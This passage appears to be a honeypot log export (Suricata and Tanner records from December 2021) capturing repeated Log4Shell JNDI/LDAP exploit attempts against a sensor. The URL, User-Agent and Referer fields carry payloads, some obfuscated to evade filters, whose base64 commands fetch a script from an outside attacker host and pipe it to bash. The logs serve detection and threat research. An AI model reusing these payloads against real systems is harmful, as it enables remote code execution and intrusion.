=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10803}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",38946,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:48:33.955875+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:48:33.955Z",1,1aHrun0BCXMCNTQLO8ey,"logstash-suricata-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",38946,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (1105)",c62e5675e85098667aceb6d9c154af41,"[]",10803,CLOSED,false,0,,,,,,,1364970959874847,,,Clifton,NA,US,US,"United States",501,"172.16.0.42","40.8364","{""lon"":-74.1403,""lat"":40.8364}","-74.1403",07014,NJ,"New Jersey","America/New_York",,,,,,,,,,,,,,,0ec2be0d4512,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",10803,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",31042744,,"{""timestamp"":""2021-12-14T21:48:33.955875+0000"",""flow_id"":1364970959874847,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":38946,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10803},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (1105)"",""gaps"":false,""state"":""CLOSED"",""md5"":""c62e5675e85098667aceb6d9c154af41"",""stored"":false,""size"":10803,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:48:33.955875+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:48:33.838Z",1,"-g3run0B5e7x5EYnL1_6","logstash-tanner-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",,0ec2be0d4512,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",335534,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""1541a10d-a190-41a1-beba-a118fe0db1e4"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 38946}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""c6ceb18d-b154-4197-80bd-964b52e36bcc""}}}, ""timestamp"": ""2021-12-14T21:48:33.838683""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",,,,,,,,,,,index,1,1,"0.6.0","c6ceb18d-b154-4197-80bd-964b52e36bcc","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",38946,,,,,,,,,200,,,inherentfocus,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:48:33.838683",,,,,,,,,Tanner,,,"1541a10d-a190-41a1-beba-a118fe0db1e4",
"2021-12-14T21:48:17.018Z",1,"0w3qun0B5e7x5EYn7V1_","logstash-suricata-2021.12.14",,"_doc","452d37b9-d260-415f-9b54-08f4845a7ba1",f66858f6c4a0,"eab87799-fa5e-43b8-86d1-d7741f8c33bc",f66858f6c4a0,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",43594,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",ac56291293ec6186a86afc3495db6b7f,"[]",9652,CLOSED,false,0,,,,,,,910554828960261,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"172.16.0.42","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,f66858f6c4a0,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",9652,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",37718822,,"{""timestamp"":""2021-12-14T21:48:17.018045+0000"",""flow_id"":910554828960261,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":43594,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""ac56291293ec6186a86afc3495db6b7f"",""stored"":false,""size"":9652,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T21:48:17.018045+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:48:17.018Z",1,"0g3qun0B5e7x5EYn7V1_","logstash-suricata-2021.12.14",,"_doc","452d37b9-d260-415f-9b54-08f4845a7ba1",f66858f6c4a0,"eab87799-fa5e-43b8-86d1-d7741f8c33bc",f66858f6c4a0,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,910554828960261,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,f66858f6c4a0,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",9652,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",37717712,,"{""timestamp"":""2021-12-14T21:48:17.018045+0000"",""flow_id"":910554828960261,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":43594,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",43594,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:48:17.018045+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:48:16.829Z",1,"Lg3run0B5e7x5EYnE1_B","logstash-tanner-2021.12.14",,"_doc","452d37b9-d260-415f-9b54-08f4845a7ba1",f66858f6c4a0,"eab87799-fa5e-43b8-86d1-d7741f8c33bc",f66858f6c4a0,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",,f66858f6c4a0,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",68088,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""5365d433-ee29-4e1b-b1b3-f0bad4b78385"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 43594}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""9f9b4399-466a-4f71-b1aa-9d417ac38f28""}}}, ""timestamp"": ""2021-12-14T21:48:16.829887""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC42OC4xMi4xNTQ6ODApfGJhc2g=}",,,,,,,,,,,index,1,1,"0.6.0","9f9b4399-466a-4f71-b1aa-9d417ac38f28","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",43594,,,,,,,,,200,,,meresorbet,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:48:16.829887",,,,,,,,,Tanner,,,"5365d433-ee29-4e1b-b1b3-f0bad4b78385",
"2021-12-14T21:47:03.200Z",1,7KHpun0BCXMCNTQL18Bl,"logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,76371243554617,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,119980f12f89,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjQyLjY0OjgwODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjQyLjY0OjgwODApfGJhc2g=}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjQyLjY0OjgwODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",48973489,,"{""timestamp"":""2021-12-14T21:47:03.200498+0000"",""flow_id"":76371243554617,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":60822,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjQyLjY0OjgwODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjQyLjY0OjgwODApfGJhc2g=}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjQyLjY0OjgwODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",60822,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:47:03.200498+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:46:34.089Z",1,RHDpun0B6VkG8jKzaR6V,"logstash-suricata-2021.12.14",,"_doc","893e61f7-ca52-48aa-ba33-de3b20163097",302cffd6ad72,"eebbfeb4-2928-48e1-93d8-adc0254d0f71",302cffd6ad72,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",51566,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",ac56291293ec6186a86afc3495db6b7f,"[]",9652,CLOSED,false,0,,,,,,,1498069841072128,,,,NA,US,US,"United States",,"172.16.0.42","35.2296","{""lon"":-80.843,""lat"":35.2296}","-80.843",,NC,"North Carolina","America/New_York",,,,,,,,,,,,,,,302cffd6ad72,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",9652,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",59976445,,"{""timestamp"":""2021-12-14T21:46:34.089665+0000"",""flow_id"":1498069841072128,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":51566,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjE3Mi4xNTEuMTIxOjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII 